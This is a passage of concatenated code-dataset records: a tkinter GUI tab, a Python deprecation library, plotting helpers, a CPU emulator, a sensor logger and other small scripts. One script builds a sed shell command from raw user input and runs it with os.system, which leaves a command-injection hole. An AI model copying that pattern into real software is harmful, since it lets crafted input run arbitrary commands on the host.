check_bin_remove_entry.insert(0,self.bin_remove_starter_line)\n \n check_entry_fn = partial(on_entry_click,\\\n text=self.bin_remove_starter_line,\\\n entry=check_bin_remove_entry)\n \n check_on_focusout_fn = partial(on_focusout,\\\n text=self.bin_remove_starter_line,\\\n entry=check_bin_remove_entry)\n \n check_bin_remove_entry.bind('', check_entry_fn)\n check_bin_remove_entry.bind('', check_on_focusout_fn)\n check_bin_remove_entry.config(foreground='grey')\n \n # grid\n runmode_label_frame.grid(column=1,row=0,sticky=(W,E))\n self.runmode_label.grid(column=0,row=0,sticky=(W,E))\n \n bigright_frame.grid(column=1,row=1,sticky=(E,N))\n \n right_frame.grid(column=0,row=0,sticky=(N))\n check_all_box.grid( column=0,row=0,sticky=(N))\n check_remove.grid( column=1,row=2,sticky=(N))\n check_draw.grid( column=0,row=2,sticky=(N))\n check_rebin_label.grid( column=0,row=3)\n check_rebin_box.grid( column=1,row=3)\n check_bin_remove_entry.grid(column=0,row=4,sticky=(N))\n check_set.grid( column=0,row=5,sticky=(N))\n \n bigright_frame.grid(rowspan=20)\n check_all_box.grid(columnspan=2)\n check_bin_remove_entry.grid(columnspan=2)\n check_set.grid(columnspan=2)\n \n check_rebin_box.grid_configure(padx=5,pady=5)\n check_rebin_label.grid_configure(padx=5,pady=5)\n check_set.grid_configure(padx=5,pady=5)\n \n # drawing style\n style_frame = ttk.Labelframe(bigright_frame,text='Drawing Quantity',\\\n pad=5)\n entry_asym_type = ttk.Combobox(style_frame,\\\n textvariable=self.bfit.fileviewer.asym_type,state='readonly',\\\n width=15)\n entry_asym_type['values'] = self.bfit.fileviewer.asym_dict_keys\n \n style_frame.grid(column=0,row=1,sticky=(W,N))\n entry_asym_type.grid(column=0,row=0,sticky=(N))\n entry_asym_type.grid_configure(padx=24)\n \n # passing\n self.entry_run = entry_run\n self.entry_year = entry_year\n self.check_rebin_box = check_rebin_box\n self.check_bin_remove_entry = check_bin_remove_entry\n self.check_all_box = check_all_box\n \n # ======================================================================= #\n def check_all(self):\n \"\"\"Check all tickboxes\"\"\"\n state = self.check_state.get()\n for k in self.data_lines.keys():\n self.data_lines[k].check_state.set(state)\n \n # ======================================================================= #\n def draw_all(self):\n \n # condense drawing into a funtion\n def draw_lines():\n for r in self.data_lines.keys():\n if self.data_lines[r].check_state.get():\n self.data_lines[r].draw()\n \n # get draw style\n style = self.bfit.draw_style.get()\n \n # make new figure, draw stacked\n if style == 'stack':\n plt.figure()\n draw_lines()\n \n # overdraw in current figure, stacked\n elif style == 'redraw':\n plt.clf()\n self.bfit.draw_style.set('stack')\n draw_lines()\n self.bfit.draw_style.set('redraw')\n \n # make new figure, draw single\n elif style == 'new':\n draw_lines()\n else:\n raise ValueError(\"Draw style not recognized\")\n\n # ======================================================================= #\n def export(self):\n \"\"\"Export all data files as csv\"\"\"\n \n # filename\n filename = self.bfit.fileviewer.default_export_filename\n filename = filedialog.askdirectory()+'/'+filename\n \n # get data and write\n for k in self.data.keys():\n d = self.data[k]\n self.bfit.export(d,filename%(d.year,d.run))\n \n # ======================================================================= #\n def get_data(self):\n \"\"\"Split data into parts, and assign to dictionary.\"\"\"\n \n # make list of run numbers, replace possible deliminators\n try:\n 
run_numbers = self.string2run(self.run.get())\n except ValueError:\n return\n \n # get data\n data = {}\n for r in run_numbers:\n try:\n data[r] = bdata(r,year=int(self.year.get()))\n except RuntimeError:\n print(\"Failed to open run %d (%d)\" % (r,int(self.year.get())))\n \n # check that data is all the same runtype\n run_types = []\n for k in self.data.keys():\n run_types.append(self.data[k].mode)\n for k in data.keys():\n run_types.append(data[k].mode)\n \n # different run types: select all runs of same type\n if not all([r==run_types[0] for r in run_types]):\n \n # unique run modes\n run_type_unique = np.unique(run_types)\n \n # message\n message = \"Multiple run types detected:\\n(\"\n for m in run_type_unique: \n message += m+', '\n message = message[:-2]\n message += ')\\n\\nSelecting ' + run_types[0] + ' runs.'\n messagebox.showinfo(message=message)\n \n # get only run_types[0]\n for k in data.keys():\n if data[k].mode == run_types[0]:\n self.data[k] = data[k]\n self.runmode = run_types[0]\n self.runmode_label['text'] = self.runmode_relabel[run_types[0]]\n \n keys_list = list(self.data.keys())\n keys_list.sort()\n \n # make lines\n n = 1\n for r in keys_list:\n if r in self.data_lines.keys():\n self.data_lines[r].grid(n)\n else:\n self.data_lines[r] = dataline(self.bfit,self.data,\\\n self.data_lines,self.fetch_data_tab,self.data[r],n)\n n+=1\n self.bfit.fit_files.populate()\n \n # ======================================================================= #\n def remove_all(self):\n \"\"\"Remove all data files from self.data_lines\"\"\"\n del_list = []\n for r in self.data_lines.keys():\n if self.data_lines[r].check_state.get():\n del_list.append(self.data_lines[r])\n for d in del_list:\n d.remove()\n \n # ======================================================================= #\n def return_binder(self):\n \"\"\"Switch between various functions of the enter button. \"\"\"\n \n # check where the focus is\n focus_id = str(self.bfit.root.focus_get())\n \n # run or year entry\n if focus_id in [str(self.entry_run), str(self.entry_year)]:\n self.get_data()\n \n # checked rebin or checked run omission\n elif focus_id in [str(self.check_rebin_box),\\\n str(self.check_bin_remove_entry)]:\n self.set_all()\n elif focus_id == str(self.check_all_box):\n self.draw_all()\n else:\n pass\n\n # ======================================================================= #\n def set_all(self):\n \"\"\"Set a particular property for all checked items. 
\"\"\"\n \n # check all file lines\n for r in self.data_lines.keys():\n \n # if checked\n if self.data_lines[r].check_state.get():\n \n # get values to enter\n self.data_lines[r].rebin.set(self.check_rebin.get())\n new_text = self.check_bin_remove.get()\n \n # check for greyed text\n if new_text != self.bin_remove_starter_line:\n self.data_lines[r].bin_remove.set(new_text)\n else:\n self.data_lines[r].bin_remove.set(\"\")\n \n # generate focus out event: trigger grey text reset\n self.data_lines[r].bin_remove_entry.event_generate('')\n\n # ======================================================================= #\n def string2run(self,string):\n \"\"\"Parse string, return list of run numbers\"\"\"\n \n full_string = string.replace(',',' ').replace(';',' ')\n full_string = full_string.replace(':','-')\n part_string = full_string.split()\n \n run_numbers = []\n for s in part_string:\n if '-' in s:\n try:\n rn_lims = [int(s2) for s2 in s.split('-')]\n except ValueError:\n run_numbers.append(int(s.replace('-','')))\n else:\n rns = np.arange(rn_lims[0],rn_lims[1]+1).tolist()\n run_numbers.extend(rns)\n else:\n run_numbers.append(int(s))\n # sort\n run_numbers.sort()\n \n if len(run_numbers) > 50:\n raise RuntimeWarning(\"Too many files selected (max 50).\")\n return run_numbers\n \n# =========================================================================== #\n# =========================================================================== #\nclass dataline(object):\n \"\"\"\n A line of objects to display run properties and remove bins and whatnot.\n \"\"\"\n \n bin_remove_starter_line = '1 5 100-200 (omit bins)'\n \n # ======================================================================= #\n def __init__(self,bfit,datalist,lines_list,fetch_tab_frame,bd,row):\n \"\"\"\n Inputs:\n fetch_tab_frame: parent in which to place line\n bd: bdata object corresponding to the file which is placed here. 
\n row: where to grid this object\n \"\"\"\n \n # variables\n self.bin_remove = StringVar()\n self.rebin = IntVar()\n self.check_state = BooleanVar()\n self.mode = bd.mode\n self.run = bd.run\n self.year = bd.year\n self.row = row\n self.bfit = bfit\n self.datalist = datalist # fetch_files.data\n self.lines_list = lines_list\n \n # temperature\n try:\n self.temperature = int(np.round(bd.camp.smpl_read_A.mean))\n except AttributeError:\n self.temperature = -1\n \n # field\n try:\n if bd.area == 'BNMR':\n self.field = np.around(bd.camp.b_field.mean,2)\n field_text = \"%.2f T\"%self.field\n else:\n self.field = np.around(bd.camp.hh_current.mean,2)\n field_text = \"%.2f A\"%self.field\n except AttributeError:\n self.field = -1\n field_text = ' '*6\n try:\n if bd.area == 'BNMR':\n self.bias = np.around(bd.epics.nmr_bias_p.mean,2)\n else:\n self.bias = np.around(bd.epics.nqr_bias.mean,2)/1000.\n \n if self.bias > 0:\n bias_text = \"%.2f kV\"%self.bias\n else:\n bias_text = \"% .2f kV\"%self.bias\n except AttributeError:\n self.bias = -1\n bias_text = ' '*7\n \n # build objects\n line_frame = ttk.Frame(fetch_tab_frame,pad=(5,0))\n year_label = ttk.Label(line_frame,text=\"%d\"%self.year,pad=5)\n run_label = ttk.Label(line_frame,text=\"%d\"%self.run,pad=5)\n temp_label = ttk.Label(line_frame,text=\"%3d K\"%self.temperature,pad=5)\n field_label = ttk.Label(line_frame,text=field_text,pad=5)\n bias_label = ttk.Label(line_frame,text=bias_text,pad=5)\n bin_remove_entry = ttk.Entry(line_frame,textvariable=self.bin_remove,\\\n width=20)\n remove_button = ttk.Button(line_frame,text='Remove',\\\n command=self.remove,pad=5)\n draw_button = ttk.Button(line_frame,text='Draw',command=self.draw,pad=5)\n \n rebin_label = ttk.Label(line_frame,text=\"Rebin:\",pad=5)\n rebin_box = Spinbox(line_frame,from_=1,to=100,width=3,\\\n textvariable=self.rebin)\n \n self.check_state.set(False)\n check = ttk.Checkbutton(line_frame,text='',variable=self.check_state,\\\n onvalue=True,offvalue=False,pad=5)\n \n # add grey text to bin removal\n bin_remove_entry.insert(0,self.bin_remove_starter_line)\n entry_fn = partial(on_entry_click,\\\n text=self.bin_remove_starter_line,entry=bin_remove_entry)\n on_focusout_fn = partial(on_focusout,\\\n text=self.bin_remove_starter_line,entry=bin_remove_entry)\n bin_remove_entry.bind('', entry_fn)\n bin_remove_entry.bind('', on_focusout_fn)\n bin_remove_entry.config(foreground='grey')\n \n # grid\n year_label.grid(column=1,row=0,sticky=E)\n run_label.grid(column=2,row=0,sticky=E)\n temp_label.grid(column=3,row=0,sticky=E)\n field_label.grid(column=4,row=0,sticky=E)\n bias_label.grid(column=5,row=0,sticky=E)\n if self.mode in ['1f','1n']: \n bin_remove_entry.grid(column=6,row=0,sticky=E)\n if self.mode == '20': \n rebin_label.grid(column=6,row=0,sticky=E)\n rebin_box.grid(column=7,row=0,sticky=E)\n check.grid(column=8,row=0,sticky=E)\n draw_button.grid(column=9,row=0,sticky=E)\n remove_button.grid(column=10,row=0,sticky=E)\n \n # passing\n self.line_frame = line_frame\n self.bin_remove_entry = bin_remove_entry\n \n # grid frame\n self.grid(row)\n \n # ======================================================================= #\n def grid(self,row):\n \"\"\"Re-grid a dataline object so that it is in order by run number\"\"\"\n self.row = row\n self.line_frame.grid(column=0,row=row,columnspan=2, sticky=(W,N))\n \n # ======================================================================= #\n def remove(self):\n \"\"\"Remove displayed dataline object from file selection. 
\"\"\"\n \n # kill buttons and fram\n for child in self.line_frame.winfo_children():\n child.destroy()\n for child in self.line_frame.winfo_children():\n child.destroy()\n self.line_frame.destroy()\n \n # get rid of data\n del self.datalist[self.run]\n del self.lines_list[self.run]\n \n self.bfit.fit_files.populate()\n \n # ======================================================================= #\n def draw(self):\n \"\"\"Draw single data file.\"\"\"\n d = self.bfit.fileviewer.asym_type.get()\n d = self.bfit.fileviewer.asym_dict[d]\n \n if self.bin_remove.get() == self.bin_remove_starter_line:\n self.bfit.draw(self.datalist[self.run],d,self.rebin.get())\n else:\n self.bfit.draw(self.datalist[self.run],d,self.rebin.get(),\\\n option=self.bin_remove.get())\n \n# =========================================================================== #\ndef on_entry_click(event,entry,text):\n \"\"\"Vanish grey text on click\"\"\"\n if entry.get() == text:\n entry.delete(0, \"end\") # delete all the text in the entry\n entry.insert(0, '') #Insert blank for user input\n entry.config(foreground = 'black')\n\n# =========================================================================== #\ndef on_focusout(event,entry,text):\n \"\"\"Set grey text for boxes on exit\"\"\"\n if entry.get() == '':\n entry.insert(0,text)\n entry.config(foreground = 'grey')\n else:\n entry.config(foreground = 'black')\n\n\n\n","sub_path":"bfit/fetch_files_tab.py","file_name":"fetch_files_tab.py","file_ext":"py","file_size_in_byte":20714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"589817555","text":"from functools import wraps\nimport inspect\n\nimport attr\n\nfrom regret import _sphinx, _warnings, emitted\n\n\nclass NoSuchParameter(Exception):\n pass\n\n\n@attr.s(eq=True, frozen=True)\nclass Deprecator:\n \"\"\"\n Deprecators help manifest regret.\n\n Arguments:\n\n emit:\n\n a callable which will be called with one argument, a\n `regret.emitted.Deprecation` instance, whenever a deprecated\n object has been used. If unprovided, by default, a warning\n will be shown using the standard library `warnings` module.\n\n name_of:\n\n a callable which given any Python object should return\n a suitable name for the object. If unprovided, the\n `__qualname__ ` will be used, and\n therefore an object's (non-fully-)qualified name will appear\n in messages.\n\n new_docstring:\n\n a callable which should produce a docstring for newly\n deprecated objects. It will be called with three *keyword*\n arguments:\n\n * ``object``, the object that is being deprecated\n\n * ``name_of``, the callable described above for use in\n calculating object names\n\n * ``version``, the version that deprecates the provided object\n\n and it should return a single string which will become\n the new docstring for a deprecated object. 
If unprovided,\n deprecation docstrings will be constructed using syntax\n suitable for `Sphinx `, via the `deprecated`\n directive.\n \"\"\"\n\n _emit = attr.ib(default=_warnings.emit)\n _name_of = attr.ib(default=emitted._qualname)\n _new_docstring = attr.ib(default=_sphinx.doc_with_deprecated_directive)\n\n def _emit_deprecation(self, extra_stacklevel=0, **kwargs):\n self._emit(\n deprecation=emitted.Deprecation(name_of=self._name_of, **kwargs),\n extra_stacklevel=extra_stacklevel,\n )\n\n # -- Deprecatable objects --\n\n def callable(\n self,\n version,\n replacement=None,\n removal_date=None,\n addendum=None,\n ):\n \"\"\"\n Deprecate a callable as of the given version.\n\n Arguments:\n\n version:\n\n the first version in which the deprecated object was\n considered deprecated\n\n replacement:\n\n optionally, an object that is the (direct or indirect)\n replacement for the functionality previously performed\n by the deprecated callable\n\n removal_date (datetime.date):\n\n optionally, a date when the object is expected to be\n removed entirely\n\n addendum (str):\n\n an optional additional message to include at the end of\n warnings emitted for this deprecation\n \"\"\"\n\n def deprecate(thing):\n @wraps(thing)\n def call_deprecated(*args, **kwargs):\n self._emit_deprecation(\n kind=emitted.Callable(object=call_deprecated),\n replacement=replacement,\n removal_date=removal_date,\n addendum=addendum,\n )\n return thing(*args, **kwargs)\n\n __doc__ = thing.__doc__\n if __doc__ is not None:\n call_deprecated.__doc__ = self._new_docstring(\n object=thing,\n name_of=self._name_of,\n replacement=replacement,\n removal_date=removal_date,\n version=version,\n )\n\n return call_deprecated\n return deprecate\n\n def parameter(self, version, name):\n def deprecate(thing):\n if hasattr(thing, \"__regret_parameter__\"):\n return thing.__regret_parameter__(name)\n return _PartiallyDeprecated(\n emit=self._emit_deprecation,\n callable=thing,\n ).__regret_parameter__(name)\n return deprecate\n\n def inheritance(self, version):\n \"\"\"\n Deprecate allowing a class to be subclassed.\n\n Arguments:\n\n version:\n\n the first version in which the deprecated object was\n considered deprecated\n \"\"\"\n\n def deprecate(cls):\n @wraps(cls, updated=())\n class DeprecatedForSubclassing(cls):\n def __init_subclass__(Subclass, **kwargs):\n self._emit_deprecation(\n kind=emitted.Inheritance(\n type=DeprecatedForSubclassing,\n ),\n )\n super().__init_subclass__(**kwargs)\n return DeprecatedForSubclassing\n\n return deprecate\n\n\nclass _PartiallyDeprecated:\n \"\"\"\n A partially deprecated callable.\n \"\"\"\n\n def __init__(self, emit, callable, deprecated_parameters=()):\n wraps(callable)(self)\n\n signature = inspect.signature(callable, follow_wrapped=False)\n kwargs_name = next(\n (\n name\n for name, parameter in reversed(signature.parameters.items())\n if parameter.kind == inspect.Parameter.VAR_KEYWORD\n ), None,\n )\n\n def _maybe_emit_deprecation(*args, **kwargs):\n arguments = signature.bind(*args, **kwargs).arguments\n for name in deprecated_parameters:\n if name in arguments:\n parameter = signature.parameters[name]\n elif (\n kwargs_name is not None\n and name in arguments.get(kwargs_name, {})\n ):\n parameter = inspect.Parameter(\n name=name,\n kind=inspect.Parameter.KEYWORD_ONLY,\n )\n else: # our best friend, the peephole optimizer bug.\n continue # pragma: no cover\n\n emit(\n kind=emitted.Parameter(callable=self, parameter=parameter),\n extra_stacklevel=1,\n )\n return callable(*args, 
**kwargs)\n\n def _regret_additional_parameter(name):\n if name not in signature.parameters and kwargs_name is None:\n raise NoSuchParameter(name)\n\n order = {\n parameter: index\n for index, parameter in enumerate(signature.parameters)\n }\n signature_ordered = sorted(\n list(deprecated_parameters) + [name],\n key=lambda each: (\n order.get(each, order.get(kwargs_name, -1)),\n each,\n ),\n )\n\n return _PartiallyDeprecated(\n emit=emit,\n callable=callable,\n deprecated_parameters=signature_ordered,\n )\n\n self.__regret_maybe_emit_deprecation__ = _maybe_emit_deprecation\n self.__regret_parameter__ = _regret_additional_parameter\n\n def __call__(self, *args, **kwargs):\n return self.__regret_maybe_emit_deprecation__(*args, **kwargs)\n\n\n_DEPRECATOR = Deprecator()\n","sub_path":"regret/_api.py","file_name":"_api.py","file_ext":"py","file_size_in_byte":7306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"465105976","text":"#!/usr/bin/env python\n#coding:utf-8\n\nimport re\nimport os\n\n\n\na=":"\nproxy=raw_input("enter ip:port: ")\nfile=raw_input("enter nginxfile: ")\nf=open("txt",'r')\nstr=f.read()\n\n\n# split the text into head, middle and tail; extract strings that may contain an IP address\n# match IPs in the middle of the text, returning a list\nresult = re.findall(r'\\D(?:\\d{1,3}\\.){3}(?:25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)\\D',str)\n\n# match an IP that may appear at the very start\nret_start = re.match(r'(\\d{1,3}\\.){3}(?:25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)\\D',str)\nif ret_start:\n result.append(ret_start.group())\n\n# match an IP at the very end\nret_end = re.search(r'\\D(\\d{1,3}\\.){3}(25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)$',str)\nif ret_end:\n result.append(ret_end.group())\n\n\n# build a list to hold the extracted IP addresses\nip_list = []\nfor r in result:\n # extract the bare IP with a regex\n ret = re.search(r'((25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)\\.){3}(25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)', r)\n if ret:\n # on a match, append the IP address to the list\n ip_list.append(ret.group())\n\nport=re.findall("[0-9][0-9][0-9][0-9]",str)\nfor i in port:\n info=ip_list[0]+a+i\n os.system("sed -i 's/%s/%s/g' %s"%(info,proxy,file))\n\n# print the result list\n#print ip_list[0]","sub_path":"改nginx反向代理ip端口.py","file_name":"改nginx反向代理ip端口.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"531472607","text":"import matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport pandas as pd\nfrom itertools import product\nimport numpy as np\n\n# plot train and validation loss across multiple runs\nfrom utility.clustering_utils import merge_predictions\nfrom utility.folder_creator import folder_creator\nfrom utility.reader import get_crypto_symbols_from_folder\n\ndef plot_train_and_validation_accuracy(train,test,output_folder,filename=None):\n fig=plt.figure(figsize=(12, 7),dpi=150)\n plt.plot(train, color='blue', label='Train')\n plt.plot(test, color='orange', label='Validation')\n plt.title('model train vs validation accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n legend_elements = [Line2D([0], [0], color='blue', lw=2, label='Train'),\n Line2D([0], [0], color='orange', lw=2, label='Validation'),]\n plt.legend(handles=legend_elements, loc='upper left')\n plt.savefig(output_folder + filename+".png", dpi=150)\n plt.cla()\n plt.clf()\n plt.close(fig)\ndef plot_train_and_validation_loss(train,test,output_folder,filename=None):\n fig=plt.figure(figsize=(12, 7),dpi=150)\n plt.plot(train, color='blue', label='Train')\n plt.plot(test, color='orange', label='Validation')\n plt.title('model train vs validation loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n 
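# explicit Line2D handles pin the legend colours to train/validation\n # regardless of plotting order (same pattern as the accuracy plot above)\n 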
legend_elements = [Line2D([0], [0], color='blue', lw=2, label='Train'),\n Line2D([0], [0], color='orange', lw=2, label='Validation'),]\n plt.legend(handles=legend_elements, loc='upper left')\n plt.savefig(output_folder + filename+\".png\", dpi=150)\n plt.cla()\n plt.clf()\n plt.close(fig)\n\n#plot the actual value and the predicted value\ndef plot_actual_vs_predicted(\n input_data, crypto, list_neurons, list_temporal_sequences, output_path):\n\n #reads the csv (merged_predictions.csv)\n data = pd.read_csv(input_data)\n #for crypto, neurons, days in product(cryptocurrencies, list_neurons, list_temporal_sequences):\n #read a specific line from the file\n data_cut = data[(data[\"symbol\"] == crypto)]\n for neurons, days in product(list_neurons, list_temporal_sequences):\n data_cut_crypto=data_cut[(data_cut[\"neurons\"] == neurons) & (data[\"days\"] == days)]\n\n #create a figure\n fig = plt.figure(figsize=(12, 7),dpi=150)\n\n #create a subplot\n ax=fig.add_subplot(1,1,1)\n plt.title(str(crypto) + \" - #Neurons:\" + str(neurons) + \" - Previous days:\" + str(days))\n plt.ylabel('Value')\n\n labels = []\n #model oriented information\n #data_cut_model_oriented = data_cut[data[\"model\"] == model]\n ax.plot(range(0, len( data_cut_crypto[\"date\"]), 1), data_cut_crypto[\"observed_value\"])\n labels.append(\"REAL\")\n ax.plot(range(0, len( data_cut_crypto[\"date\"]), 1), data_cut_crypto[\"predicted_value\"])\n labels.append(\"PREDICTED\")\n\n plt.xticks(np.arange(12), data_cut_crypto[\"date\"], rotation=65)\n plt.legend(labels, loc=4)\n plt.grid()\n fig.tight_layout()\n name_fig = str(crypto) + \"_\" + str(neurons) + \"_\" + str(days)\n fig.savefig(output_path + name_fig + \".png\")\n return\n\n\ndef generate_line_chart(experiment_folder,list_temporal_sequences,list_neurons):\n cryptocurrencies = get_crypto_symbols_from_folder(experiment_folder + \"result/\")\n\n merge_predictions(experiment_folder, \"result\")\n\n #create the folder which will contain the line chart\n for crypto in cryptocurrencies:\n folder_creator(experiment_folder+\"/report/line_chart_images/\"+crypto,1)\n plot_actual_vs_predicted(experiment_folder+\"/result/merged_predictions.csv\",\n crypto,\n list_neurons,\n list_temporal_sequences,\n experiment_folder+\"/report/line_chart_images/\"+ crypto+\"/\")","sub_path":"visualization/line_chart.py","file_name":"line_chart.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"615465773","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nHLT = 0b00000001\nLDI = 0b10000010\nPRN = 0b01000111\nMUL = 0b10100010\nPUSH = 0b01000101\nPOP = 0b01000110\nCALL = 0b01010000\nRET = 0b00010001\nADD = 0b10100000\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n \n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.reg = [0] * 8\n self.ram = [0] * 256\n self.pc = 0\n self.sp = 7 #points to register not ram location\n self.running = False\n self.branchTable = {\n HLT : self.hlt,\n LDI : self.ldi,\n PRN : self.prn,\n MUL : self.mul,\n PUSH : self.push,\n POP : self.pop,\n CALL : self.call,\n RET : self.ret,\n ADD : self.add\n }\n\n def ram_read(self, MAR):\n return self.ram[MAR]\n \n def ram_write(self, MAR, MDR):\n self.ram[MAR] = MDR\n \n def push(self, a, b):\n reg = a\n value = self.reg[reg]\n self.reg[self.sp] -=1\n self.ram_write(self.reg[self.sp], value)\n self.pc += 2\n \n def pop(self, a, b):\n reg = a\n value = self.ram_read(self.reg[self.sp])\n self.reg[reg] = value\n self.reg[self.sp] 
+=1\n self.pc += 2\n\n def call(self, a, b):\n reg = a\n after = self.pc + 2\n self.pc = self.reg[reg]\n self.reg[self.sp] -= 1\n self.ram_write(self.reg[self.sp], after)\n\n def ret(self, a, b):\n self.pc = self.ram[self.reg[self.sp]]\n self.reg[self.sp] += 1\n\n def hlt(self, a = None , b = None):\n self.running = False\n\n def ldi(self, a, b):\n self.reg[a] = b\n self.pc += 3\n\n def prn(self, a, b = None):\n print(self.reg[a])\n self.pc += 2\n\n def add(self, a , b):\n self.alu('ADD', a, b)\n self.pc+=3\n\n def mul(self, a, b):\n self.reg[a] = self.reg[a] * self.reg[b]\n self.pc += 3\n\n def load(self, program):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n\n program = program\n with open(program) as f:\n for line in f:\n command = line.split('#')\n command = command[0].strip()\n if command == '':\n continue\n command = int(command, 2)\n self.ram[address] = command\n address += 1\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n #self.fl,\n #self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n self.running = True\n # breakpoint()\n\n while self.running:\n IR = self.ram_read(self.pc)\n operand_a = self.ram_read(self.pc + 1)\n operand_b = self.ram_read(self.pc + 2)\n if IR in self.branchTable:\n self.branchTable[IR](operand_a, operand_b)\n else:\n print(\"Automatically Exited\")\n self.hlt()","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29792933","text":"from abc import ABCMeta, abstractmethod\nfrom dataclasses import dataclass, field\nfrom time import time\nfrom functools import partial\nfrom math import floor\nfrom typing import List, Any\nimport gpiozero\nimport influxdb\nimport socket\nfrom time import sleep, time\nimport json\n\n\n@dataclass\nclass MCP():\n select_pin: int\n channels: int\n voltage: float\n\n def __post_init__(self):\n chip_name = f'MCP300{self.channels}'\n self.__chip = getattr(gpiozero, chip_name)\n\n def __getitem__(self, channel):\n mcp = self.__chip(\n channel=channel,\n select_pin=self.select_pin\n )\n value = mcp.value\n mcp.close()\n return round(value, 2)\n\n def __iter__(self):\n return (\n self.__getitem__(channel)\n for channel in range(0, self.channels, 1)\n )\n\n\n@dataclass\nclass Multiplexer():\n channels: int = 8\n devices: int = 2\n voltage: float = 3.3\n\n @property\n def select_pins(self):\n pins = [8, 7]\n total = self.devices - 2\n start_pin = 12\n for pin in range(\n start_pin,\n min((total + start_pin), 25),\n 1\n ):\n pins.append(pin)\n return pins\n\n def __post_init__(self):\n self.__chips = []\n for pin in self.select_pins:\n chip = MCP(\n select_pin=pin,\n channels=self.channels,\n voltage=self.voltage\n )\n self.__chips.append(chip)\n\n def __getitem__(self, channel):\n device = floor(channel / self.channels)\n channel = channel % self.channels\n return self.__chips[device][channel]\n\n def __iter__(self):\n return (\n value \n for chip in self.__chips\n for 
value in chip\n )\n\n\nwith open('./config.json') as json_file:\n config = json.load(json_file)\n\nclient = influxdb.InfluxDBClient(\n host=config['influx']['host'],\n port=config['influx']['port'],\n ssl=True,\n database=config['influx']['database']\n)\nmultiplexer = Multiplexer(\n channels=config['chips']['channels'],\n devices=config['chips']['devices'],\n voltage=3.3\n)\ndevices = gpiozero.LED(26)\nwhile True:\n devices.on()\n data_wrapper = [{\n 'measurement': 'sensor_boxes',\n 'tags': {\n 'box': config['local']['name']\n },\n 'time': int(time()),\n 'fields': {\n str(index): value\n for index, value in enumerate((multiplexer))\n }\n }]\n devices.off()\n client.write_points(data_wrapper)\n sleep(3600)\n","sub_path":"sensors/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"541682503","text":"import requests\nimport time\nimport json\nimport re\n\nFIREBASE_HOST = 'burning-fire-3884.firebaseio.com'\n\nif __name__ == '__main__':\n\n s = requests.Session()\n res = s.get('https://' + FIREBASE_HOST + '/new_game/.json')\n games = json.loads(res.text)\n game_arr = []\n minimal = 3000000\n maximal = -1\n earliest = 1500000000\n latest = 0 \n\n for game in games:\n if re.search(r'(19|20)\\d{2}-(0[1-9]|1[0-2])-(0[1-9]|[12]\\d|3[01])', games[game]['time']):\n t = time.strptime(games[game]['time'], '%Y-%m-%d')\n games[game]['time'] = int(time.mktime(t))\n games[game]['name'] = game\n game_arr.append(games[game])\n if games[game]['view'] > maximal:\n maximal = games[game]['view']\n if games[game]['view'] < minimal:\n minimal = games[game]['view']\n if games[game]['time'] > latest:\n latest = games[game]['time']\n if games[game]['time'] < earliest:\n earliest = games[game]['time']\n print(game)\n\n print('Minimal: ' + str(minimal))\n print('Maximal: ' + str(maximal))\n print('Earliest: ' + str(earliest))\n print('Latest: ' + str(latest))\n\n res = s.put('https://' + FIREBASE_HOST + '/game/.json', data=json.dumps(game_arr))\n print(res)\n","sub_path":"project3/rebuild.py","file_name":"rebuild.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"149128941","text":"'''\nProblem Statement:\n\nGiven a word w, rearrange the letters of w to construct another word s\nin such a way that s is lexicographically greater than w. 
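For example,\nw = "ab" can be rearranged to s = "ba", while w = "bb" admits no such s. 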
